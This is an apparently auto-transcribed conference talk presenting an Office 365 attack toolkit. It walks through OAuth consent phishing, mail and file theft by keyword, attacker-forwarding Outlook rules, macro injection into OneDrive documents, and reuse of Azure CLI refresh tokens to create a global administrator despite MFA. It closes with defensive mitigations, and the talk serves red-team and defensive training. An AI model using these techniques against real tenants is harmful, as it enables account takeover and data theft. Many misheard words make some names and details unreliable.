Introducing Office 365 Attack Toolkit

okay so hi everyone thank you for coming to my talk this is introducing the office 365 attack toolkit so let's continue Who am I my name is Rio Cherie I work as a senior security consultant at MD SEC where I'm responsible for performing rating operations of pentest services and other interesting offensive security stuff I'm also interested in low-level research like Windows internals playing with reverse engineering and also with exploitation on my free time and company time as well I develop offensive security tools and you can find more about the tools and research window at our blog or follow me on Twitter so yeah so what is this talk about during our a-team operations we frequently come in

contact with organizations using office 365 and usually when we did operations all the time you had to develop tools because the tools that were publicly available we're somehow limited and that's why we decided to create a new tool the office t65 attack toolkit that we can use doing operations without the hassle of going to modify and develop new tools so in this talk I will explain all these features this tool has and how it can assist you if you are performing a phishing simulation or letting exercise I'll also visit authentication token phishing what it is and how it works and then we'll take a look at the Microsoft graph API how we can use it

for our purpose and as a bonus I will talk about something interesting I found on a show CLI so what is office365 as probably many of you know of his 65 office365 is the line of subscription services offered by Microsoft essentially it allows companies to around the office to test a cloud-based software service and it allows you to run that without the headache of managing hundreds of different we office versions across your entire environment and it's also safer than the average company deployment that's because it's out of dates obviously but also some of the features that are usually exploitable on workstation laptops are not available like for example macros and even if you have like a zero-day forward if they are

using office 365 web the document is not actually parsed in the user word application but on the web so it won't affect it there are some ways to get around that and trick the user to open the document on their local computer which I will talk later on about it so that's all about office 365 if you want to read more you can just go on google and find as much information as you want the other part of this talk is the Microsoft graph API so essentially the Microsoft graph API is a developer's API platform which allows developers to integrate their applications with the office 365 products for example to integrate before onedrive SharePoint you

name it so this is built on top of office 365 but it's not actually limit to office 656 5 so for example if you are a company you want to create a bot that sends a receive emails you can easily do that because the the graph API allows you to interact with Outlook and to access user emails to send the emails as as a user or many other features also let's say you want to make an anti-virus for the cloud for your cloud environments for for example for the files that are a onedrive or SharePoint you can easily do that you can just call the graph API and access the files that are there like a proper file system so

as you can see from two examples I gave there are many many more features but only from these two examples you can see that this API is like really really powerful and when something is really really powerful it leaves also room for abuse so that's what the tool does but - call the microscopy FBI we first need to had the authentication token an access token so basically the access token is the token that is provided to you that by the Microsoft identity platform and it has the permissions that the user granted you I will tell you later on about how that works and what the users gives you for permissions but first I want to revisit the

authentication token fishing so what is authentication token fishing authentication token fishing is not your traditional fishing where user enters his credentials to a website and then you steal them and then you can use to perform operations in this case the credentials are entered in the legitimate Microsoft website so when the users are trained just sorry to say are trained to not enter the credentials on malicious website this thing gets around because literally they are entering for the legitimate Microsoft website and also this is really useful as well because recently we have seen your eyes on multi-factor authentication and if the user is using multi-factor authentication let's say use something like Avon Jack's to retrieve the

username password and token your you're like really time limited on what you can do so you need to log in immediately otherwise the token will not be valid anymore and this thing gets surrounded because when the user grants you the permissions to perform actions on me they only speak of its you don't have to use any mortal token because you're literally just performing actions so this is in itself it's not something new the first publicly documented attack was by ABC 28 on the famous DNC hack when they abused the Google of as Google off to actually compromise I don't remember the name of the politician but to compromise his emails and then leaked them to sorry

yes and leave them on the leave them on the Internet WikiLeaks so I am so now we have a good understanding of all the I say the methodologies this tool uses so what is office 265 attack toolkit so office365 attack group it is at all developed in golang which allows operators to perform authentication token phishing and then after it getting the a valid access token then it will start to call the Microsoft graph API and use the required permission that the user granted to perform actions on its behalf so there are currently some recurrent support the teachers are the extraction of emails matching specific keywords the creation of malicious Outlook rows extraction of us from

onedrive SharePoint and the macro injection on more documents so I will talk a little bit more in details of how we can use these features to actually be useful in a when you are performing a phishing assessment or something similar so the first feature is the extraction of emails using predefined keywords from Outlook so let's say that usual as you may know people on email usually stored a lot of confidential information including username username and passwords a confidential user data like attachments or or we have seen cases evil like containing passwords spreadsheets on their email so what you can do is you can define specific keywords that this tool will search the user email box and for every mail that

matches a specific keyword it will download them and say them and then you can later on investigate all the emails and see all the contents so another interesting one is the extraction of files using predefined keywords from onedrive SharePoint so this works the same way you just defined keywords but in play in comparison with the down-low to females this actually downloads the files so for example if the user has uploaded an SQL file with all the customer credentials you can like specify the SQL keyword and then it will download all the SQL say files or if the user has a password spreadsheet on his onedrive or let us keep a password database so you can do that you just

specify the keyword and when the user grants you permission the tool will search all the files that the user has download those ones match the keywords and then the attacker or us in this case can just like use that information to further compromise environment so the other one and this quite interesting is the creation of malicious outlook rules so as you may know Cook has the rule engine which allows you to perform actions when a specific events happen and this is really useful for us as well as the Packers because we can come with really good ideas creative ones so for example you can create a rule on Outlook that will forward all the emails containing

sensitive info information to an attacker controlled email address so for example if you create a new rule and say if it has an attachment and it has the keywords like top secret or confidential or passwords then it will send that when the email comes from whoever they it will send that email to the attacker controlled email address so even if you like have lost access and the rules will probably still be there because no one looks for the author for the articles then you get the data so even if you literally don't have anymore access but you still keep receiving confidential data about the client so the other one is the fort of password reset emails so

let's say the user is using a third party system to using a third-party system and his sign they signed up with his work is an email address so what we can do is create a rule that says if there are any password reset emails let's just like if it contains word passwords and reset then forward all this emails on attack controlled email address so in this case you just go to the third-party service issue password reset the email with a password reset information will be sent to the user but then also after sending because the rule is there it will parse this email and also send it to the attacker and in this case you just literally can't access to

a third-party service without even having access to the user email anymore I didn't know this feature but apparently outlook also allows you to create rules based on outgoing emails so in this case you can create an email rule that will prevent the user from reporting something suspicious is going on whether if you see the heightened security team so yeah this is about outlooks location and let's go to the word document macro injection so this is actually my favorite - a favorite feature of this tool as it allows you to inject macro macro on the user onedrive of a macro on the user word documents that are stored on onedrive so if this tool is if this feature is enable what

it will do is retrieve the 15 last access documents on your on your be a factory machine inject the macros that you previously defined on a configuration file and then it will upload them on the onedrive you can replace the original file so you may ask okay you define the macro but you previously said that the macros do not work on office365 which is true and then we come back to the interesting part so apparently office365 does not support Word 2003 documents so what you can do is if you change the part extinction of the file from duck eggs to that dog then obviously six five will not parse it and we say the user that

you need to download and open it locally which is really useful and since the document in itself is the original and this literally something that the user thinks is private it is way more trusted than something that comes from the internet and they under your chances of actually the user enabling content executing the macro are really high so yeah that's all about the Bukit feature I will also get a lot on how to deploy it properly but first we need to understand the components this tool is made from so there are three main components the first one is the fishing end point which was searched the fishing page to the user and this is responsive

and the other one is the back end service which is responsible for performing all the attacks so these crew chiefs access token intend does all the defined attacks like the extractor of emails sectional files and injection of macro documents and then we have the management interface which is pretty clear by the name as well which is used to inspect the extracted information that you got from the user but how would the proper architecture look like so this is the suggested deployment and as you can see there's like the attacking infrastructure which is constructed by two server the first one is HD based right director which for a directs all the the traffic to our external server which is the

phishing endpoint then the the host running the toolkit the backend service will call the Microsoft graph API perform all the attacks and then we as an attacker can use that the management interface to inspect all the data so I will get back to why we need to use like such an isolated architecture later on but first let's see how we can deploy it so there are three main components on the configuration file they are the server keywords in the backdoor so the server component contains five options which is the host the IP address of the external listener or the phishing endpoint we have the external port the port where the fishing endpoint will listen to and

then we have certificate and key which are the public certificate and private key if you want to use HTTP or HTTPS for your fishing endpoint and then we also have the internal port which is the management interface as you can see there is no host for the internal management interface this is because it only listens on the localhost then we get back to keywords so we have two options here and they're quite similar but they do different things so in this case I defined five keywords that I want to extract from Outlook emails which are passed VPN credits credentials and then from onedrive we do the same we extract a password file of the files containing

the word password the files containing config or XML or database which are usually the files that have confidential confidential information and then the third option is the backdoor we can enable or disable this and the macro is the file path of the macro document you want to inject so it should be mentioned that the backdooring functionality award works only on Linux oh sorry on Windows as Windows is it's essentially how this injection work is tell you it uses the word chrome object to open the file and then inject it inject the macro so yeah now that we have a proper configuration we need to go to we need to create an apple because the goal any Microsoft

grave API resources you have to have an average certain Asia so you can easily do that you just go to Asia active directory up registration register an application and you can define the name that you want so in this case I just called it cool app but you can change the name that met in whatever matches your protects protects when you're doing the fishing also just keep in mind to select the accounts in any organizational directory because if you don't select this one you can only attack or let's say fish users that are on the same organizational directory it is not really useful but in some case this is ok so you created the application you get the application ID

and then you change to static index dot HTML and then you add the right direct URL with your fishing endpoint so basically the right direct URL is used by Microsoft when they send access token so this is your fishing endpoint and it has to be correct because otherwise it won't work also because we the current implementation is just a single web app JavaScript app you need to enable implicit grant because otherwise it won't work again so yeah so by default the fishing endpoint is not pretty and not useful and I'm really bad at designing so but I also left it on purpose because I don't want to provide people with a fully a full template

which they can just like straightaway used to fish other people so but it's fairly easy to modify as you the HTML file is hosted on static index dot HTML so you can just change the static index dot HTML file instead change HTML file on whatever the pretext is and then you're good to go so now you configure the tool you change your fishing HTML file you created all the outlook rules that you want and then you're ready to go right well as you may know with a with any tool that you run on your system like being in the defensive tool being an offensive security tool this place always for some other people to attack there's

always an increase in attack surface so in this case I wanted to talk about some of the attack surface which is not let's say really dangerous but at some point it may be if you don't have two things properly so the macro injection functionality is kind of dangerous in this case if you're not if you don't do it properly obviously because the way it works is it downloads the user files and then stores them on your attacker machine and then use this word home object to actually open the word document and eject the matter so in this case if you're running all the version of weak windows and you're running the pool on your main boss then

things can go really wrong because if the file that you downloaded that matches that specific that has been used by user actually contains a macro or exploit or some exploit code that targets a version of the Windows Office that you're running on your box then things may go wrong so it's always important that's why I suggest don't architecture to have a proper isolation between the host and to also use an updated office because even as the taggers need to use updated software otherwise we will get popped and then is extraction of keyboard a fast Maybrick danger so this is not really really dangerous but we have seen cases that when you download like just by file

being present on the file system it can trigger like some exploit so we saw that with Stuxnet which is just like an L&K fall butch eagle command execution and then we also saw the same recently with Linux that was like a keyd command injection bug so yet you need to be made aware of all the dangers that this'll pass so as I said this is I'm saying this if from a perspective where an attacker is trying to attack the attacker I mean it probably won't happened in your lifetime but it's good to know also as I mentioned as he also suggests to the defensive part of security we also need to properly isolate configure and manage the interest in fruss truck

sure security so yeah that's all about the whole 56 5 attack toolkit I still have still have not finished I'm going to do a quick demo okay so I'm pretty sure is not really visible is it yeah it is okay so as you can see we have a Windows VM which is running the toolkit you can see that it says loaded model successfully because I defined one of local just to demonstrate the feature and then we have the internal server and the external server both running on the local host is just for demonstration purposes so yeah so this is our user that is going to be phished so he has two documents the business partnership document and the password

document which is kind of funny because sometimes is it is both the password on Excel spreadsheets so that just keep in mind the extension is the actual out dot docx because it will change later on and then we have an email which supposedly contains some credentials this is also just to demonstrate and then as we can see there are no inbox rules on this user so this is the best-looking phishing and poet I'm pretty sure everyone will vote right so when the users click sign-in actually am Microsoft signing not signing page but Microsoft page pops up and it says to you that this application is trying to request permissions and my application in this case name is the Cecily G tank

which is not but you can change that to match whatever to much whatever whatever protects you are using to do the fish and as you can see there are like they are pretty clear what the app will access it says it will read your contacts read your email read all OneNote books you can read all your files and everything but the user will still click accept because that's the blue button and it looks cool to click it so so after the users click accept this actually came over at this moment way gates like the access token and then the backend service is actually performing all the attacks on back-end so this is the management interface get

back to it again but let's see five power attack work or so we can see there was no Priya no rules defined and then refreshing your page we can see that very single that is like the example that I previously defined that will send all the attackers all the password reset email detector all that as you can see the documents the user had has just been changed and also the file the extension has been renamed from docx docx so when he tries to open it he cannot edit it and when he downloads it on his box and opens it it's like literally the same document that user hand so he neighbors editing because protected mode is

enabled and when he clicks enable content then our malicious macro but executed in this case is just the message box but can be whatever you want then we can go to the administer the management interface we can click new emails and see all the emails that have been extracted from this user you can see your body preview all the emails but you can also see the entire email called by clicking view email all so you can view and download the Nexus all the files that is the very extract from this user in this case only one file matched the rule like the password Oak X but as I mentioned that is this is just for demonstration purposes a

real-life it's way more files map so that's the demo for office 365 but Pulkit let's get back to the presentation so what is a juicy line wise in this talk so for those who don't know I realized a command-line tool which allows you to manage Asia resources and to actually automate the creation of Asia resources and it's like really easy to learn it's like quite powerful so I was playing around with it and then I figured something strange was happening but before using the tool you have to use the command a as login which will open a my a sure sign in page and you enter the credentials and then it will just work magically and I got back

using the tool after one month and then it worked it did ask me for lucky and I was like okay there's something weird going on so I just set it up again and so the entire workflow of this tool so essentially it was starting a local web server and then sending the access token to the local web server the axis and refresh tokens and then they were storing that access and refresh token on the file system in clear-text I was like that's not really good so the the axis there was a file named exit open that JSON which contained if refresh and token the access token so the Refresh token is okay let's begin with access token the access token is

actually the token that achieves tax is the graph API or other API on Microsoft but the thing is that this token by itself is not really useful if you managed to get access to it his life its lifetime is I think one hour so not really useful but then we have the Refresh token which its lifetime is I think one year or something like that and then this token can be used to get new access tokens so if you have the Refresh token you just can't achieve your access token I'll call the graphing the API that you want so this is really useful because as I mention earlier a lot of users and admins are using two FA or MFA but the

problem is that when you grant access to one application the application doesn't have to use the MFA anymore it can just say to go and call the API they want so I did the tool for this whole day's a jacilla extractor I still haven't published it but then publish later on on my github so basically what this tool does is extract the access token and the Refresh token and then it can create a new global administrator on or on asian offices expire and because this tool is mostly used by let's say sis system admins and like IT people generally though they have more privileges and privileges in Asia and like the office is six-five so yeah that's so we can use that even

if they have MFA we can use that to get around it and like compromise compromise their cloud environment so I also have a demo for this one which is way easy to explain rather than just talking randomly so let's suppose we managed to gain access to some user machine and we got his username and password right so cool now we just completed already my objective you go to sign-in we enter the password I try to sign in then not so fast so there's like this administrator has to FA enabled so we cannot we either have to compromise his phone or find another way around it if I want to spend millions on compromising phones we're not a Saudi Arabia instable

fortunately for us this user has the Israelite pull kit installed so what we can do is use a scissor CLI extractor and call the command that user then we can define the options like the display name which is demo user they use the name which in this case is compromised and then we also have to define the account principle which is I say not the email address exactly but and in this case is compromised at the agency light mo let on microsoft.com and then we need to specify password which you need to also have it - to match the password policy for office 365 and as we can see the tool DD job it has a new user and

then adds that user to the global administrative verbs so we didn't manage to get access using the demo account but then we just use the newly created account to log in so we entered the email address then we enter the password that we created which is secured password one two three I changed it so don't try to login and then we can see we managed to gain access to the portal unless you can see we also have administrative permissions it's a bit confusing here because that woman is the name and I was doing the demo and then we log into the office 65 administrator portal with high privileges bypassing 2fa completely so that's all about a CLI

so everyone is saying okay this is quite cool but I work on the defensive side and people start using this to fish my users and what can I do so there are actually a lot of stuff that you can do and I think Microsoft has one of the best ice a tool to use that you can prevent all sorts of tax so the first one is you need to restrict users from registering applications so basically by default the any user on your aja of our Active Directory environment king can register your application this is really useful if you're an attacker because if you manage to compromise user then you can register your application and the application

will be from the same organizational directory and it's like trusted so when you send a fish to the user the user will see that okay so this is the application from our companies so it should be legit and they are more suspect about to phishing attacks and if you stop users from registering app and also only allowing administrators to do so or developers how you will prevent this kind of attack also if you don't use any third-party apps you can if I would save them just what most people do hopefully and then if you see that some if you see that an application compromising one of your users you can revoke the permissions that this

application has and also notify the user and you can if if you're doing like an incident response for this kind of compromised there is a feature called or about dating on Microsoft which essentially provides you the comprehensive monitoring of all the activities performed by an application which is quite useful and I think every applicator every system that uses some kind this architecture should have it and also on the cloud of security portal you have you can define alerts so for example if an application gets permission to or user mailbox to read all the emails it's not like really how it should work so the view alertness check if that application is legitimate or not and also you can

search for risk apps using the same portal so for example there are a lot of queries but in this case it's in searching if any app has requested this permissions from the user which are made to write access to user email and full access to the mailboxes and other stuff that is not normally used by a legitimate application but it is a lot from attackers though so I was quite surprised I saw honest news portal that apparently Facebook is improving and they are now notifying users whatever the third-party application actually login so let's say accesses resources using the permission they were granted previously which i think is quite cool and this the way to go and I think also

Microsoft should implement this because currently as far as I'm aware the tools are only targeted to that miss so let's say if you want to investigate what happened you cannot see when the application got access to a specific resource or what happens all the us and administrator can see it so I think Microsoft should also implement is that whenever a third-party application access resource they should like notify the user it doesn't have to be an email but you can notify the user that look this application just access this resource and then the user will be more aware of what application is going on the back so that's about mitigations I want to talk about also some

references so there are a lot of cool stuff going around chromium defensive security side and if you're not following him you probably are but if you're not you should follow him the Chinese putting out some really amazing research not only for Asian and office uses five but Active Directory as well then there is another tool called bone off from fire and dog sack which has this kind of similar approach but it's more targeted just for proof of concept rather than fully weaponized I also wanted to mention massive scale calm which is quite useful and explains all this Microsoft stuff really well and as always the site that I spend most of my life in is dogs that Microsoft

calm which contains all the information about the graph API and any kind of Microsoft products yeah I think I'm quite the head of time which is cool so we have a lot of time for questions anyone have any questions yep no how do you get influence no so actually the way the thing also the case was when you're right in an environment let's say you're trying to compromise some some administrators and in this case were already on the environment you know managed to get access to that file let's say by either finding a backup or like on a network share someone to share like their home folder and which is usually the case so there are a lot of

ways you can get to the environments like MFA is really helpful and it's really headache but then there are a lot of stuff that you can use to actually get around it yes yes also like if you have some specific I cannot recall correctly how you to do it but I'm pretty sure there is like a way to only allow specific application form accessing use the resource you can even specify the application permissions so for example if you want an app to all the access the user information even if that application goes rogue and says like ok I'm going to steal all the user emails they can because you define previously that this application should

only have access for this resource [Music]

yes yes you can so basically this tool is more aimed at like users but if you fish administrator then you can do a lot more damaging stuff but this in most of the cases we it's not really useful to fish not me later because they are more trained and the way how like system work but there have been a lot of cases where that happens on anyone else ok well so I haven't looked at a children right up until Dharana yeah I haven't looked at think about maybe I think Microsoft page like they literally have so many documentation and explain things in much detail so I think the best place is Microsoft itself no one else no

curiosity anymore ok then thank you very much you